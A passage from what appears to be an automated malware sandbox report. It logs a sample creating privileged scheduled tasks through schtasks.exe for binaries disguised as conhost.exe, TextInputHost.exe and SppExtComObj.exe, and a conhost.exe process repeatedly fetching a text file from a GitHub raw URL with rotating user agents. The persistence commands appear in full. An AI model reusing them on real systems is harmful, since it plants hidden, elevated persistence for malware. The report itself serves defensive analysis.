- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2728

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3676

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 9 /tr "'C:\providercommon\TextInputHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1256

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\providercommon\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5076

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 8 /tr "'C:\providercommon\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\SppExtComObj.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2360

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Users\Default User\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2208

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2864

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

104.219.191.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

104.219.191.52.in-addr.arpa

IN PTR

Response
DNS

88.210.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.210.23.2.in-addr.arpa

IN PTR

Response

88.210.23.2.in-addr.arpa

IN PTR

a2-23-210-88deploystaticakamaitechnologiescom
DNS

22.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.160.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

raw.githubusercontent.com

conhost.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.109.133
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

conhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 09:57:22 GMT
Via: 1.1 varnish
X-Served-By: cache-lon420107-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734861443.887831,VS0,VE79
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: b4db9cd5a82b6c43cef61f3367cacb350fc60949
Expires: Sun, 22 Dec 2024 10:02:22 GMT
Source-Age: 0
DNS

133.110.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.110.199.185.in-addr.arpa

IN PTR

Response

133.110.199.185.in-addr.arpa

IN PTR

cdn-185-199-110-133githubcom
DNS

149.220.183.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

149.220.183.52.in-addr.arpa

IN PTR

Response
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

conhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 09:57:33 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600085-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734861454.975177,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 6b45ffd78c635e387fc15069117d518ec2806202
Expires: Sun, 22 Dec 2024 10:02:33 GMT
Source-Age: 24
DNS

197.87.175.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

197.87.175.4.in-addr.arpa

IN PTR

Response
DNS

198.187.3.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.187.3.20.in-addr.arpa

IN PTR

Response
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

conhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 09:57:47 GMT
Via: 1.1 varnish
X-Served-By: cache-lon4254-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734861467.203073,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: a1f24fbddf9a851d91065d0da64cb75b53a96bf0
Expires: Sun, 22 Dec 2024 10:02:47 GMT
Source-Age: 24
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

conhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 09:57:57 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600064-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734861477.050362,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: e7c4c1c8237d44e72e86fe9a9ab880f16f82f56d
Expires: Sun, 22 Dec 2024 10:02:57 GMT
Source-Age: 47
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

conhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 09:58:04 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600099-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734861484.421507,VS0,VE3
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 09cc37dee118e07817b9f3d9ab4dfa82b3ab4827
Expires: Sun, 22 Dec 2024 10:03:04 GMT
Source-Age: 54
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

conhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 09:58:15 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600098-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734861496.600509,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 0d29a7e4c17594de971ddcc06cd1b39d9feb59ea
Expires: Sun, 22 Dec 2024 10:03:15 GMT
Source-Age: 66
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

conhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 09:58:27 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600042-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734861507.042824,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 4158dcf32808e733ef6db1c3d66fb18c48814fdf
Expires: Sun, 22 Dec 2024 10:03:27 GMT
Source-Age: 77
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

conhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 09:58:34 GMT
Via: 1.1 varnish
X-Served-By: cache-lon420092-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734861514.319230,VS0,VE31
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: c2772543314ef38741c085e388ebf544bda29ed5
Expires: Sun, 22 Dec 2024 10:03:34 GMT
Source-Age: 71
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

conhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 09:58:40 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600057-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734861521.881010,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 89e8ee106e5b85d2d0f4f4f0d8e7ad62fd19a4ca
Expires: Sun, 22 Dec 2024 10:03:40 GMT
Source-Age: 91
DNS

29.243.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.243.111.52.in-addr.arpa

IN PTR

Response
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

conhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 09:58:53 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600079-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734861534.952867,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 5d78935c0a01a6d40ff4d51f3359b9868cd72f7c
Expires: Sun, 22 Dec 2024 10:03:53 GMT
Source-Age: 104
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

conhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 09:59:04 GMT
Via: 1.1 varnish
X-Served-By: cache-lon4233-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734861545.529286,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 9321e17f83c072096f34ccbfd0bb1d739b418d05
Expires: Sun, 22 Dec 2024 10:04:04 GMT
Source-Age: 102
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

conhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 09:59:13 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600058-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734861554.717869,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 249f02be0ec92e1ef692fb63f311a5b7e0c5ec1a
Expires: Sun, 22 Dec 2024 10:04:13 GMT
Source-Age: 124
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

conhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 09:59:21 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600035-LCY
X-Cache: HIT
X-Cache-Hits: 2
X-Timer: S1734861562.844242,VS0,VE0
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 294c602d0cfe1cc5883d36aababf5b49e2294d7b
Expires: Sun, 22 Dec 2024 10:04:21 GMT
Source-Age: 131
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

conhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 09:59:34 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600020-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734861575.969012,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 2654a0640e6c8c6ceaa8263c6b72dc99da84001d
Expires: Sun, 22 Dec 2024 10:04:34 GMT
Source-Age: 145
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

conhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 09:59:41 GMT
Via: 1.1 varnish
X-Served-By: cache-lon4236-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734861582.993573,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 9ab7a8e8db04a52d462f2cfd02cafa093dff1779
Expires: Sun, 22 Dec 2024 10:04:41 GMT
Source-Age: 139

185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

conhost.exe

861 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

conhost.exe

914 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

conhost.exe

949 B
5.1kB
9
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

conhost.exe

914 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

conhost.exe

861 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

conhost.exe

914 B
5.1kB
8
10

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

conhost.exe

914 B
5.1kB
8
10

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

conhost.exe

861 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

conhost.exe

861 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

conhost.exe

914 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

conhost.exe

914 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

conhost.exe

914 B
5.1kB
8
10

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

conhost.exe

861 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

conhost.exe

914 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

conhost.exe

861 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

104.219.191.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

104.219.191.52.in-addr.arpa
8.8.8.8:53

88.210.23.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

88.210.23.2.in-addr.arpa
8.8.8.8:53

22.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

22.160.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

raw.githubusercontent.com

dns

conhost.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.110.133

185.199.108.133

185.199.111.133

185.199.109.133
8.8.8.8:53

133.110.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.110.199.185.in-addr.arpa
8.8.8.8:53

149.220.183.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

149.220.183.52.in-addr.arpa
8.8.8.8:53

197.87.175.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

197.87.175.4.in-addr.arpa
8.8.8.8:53

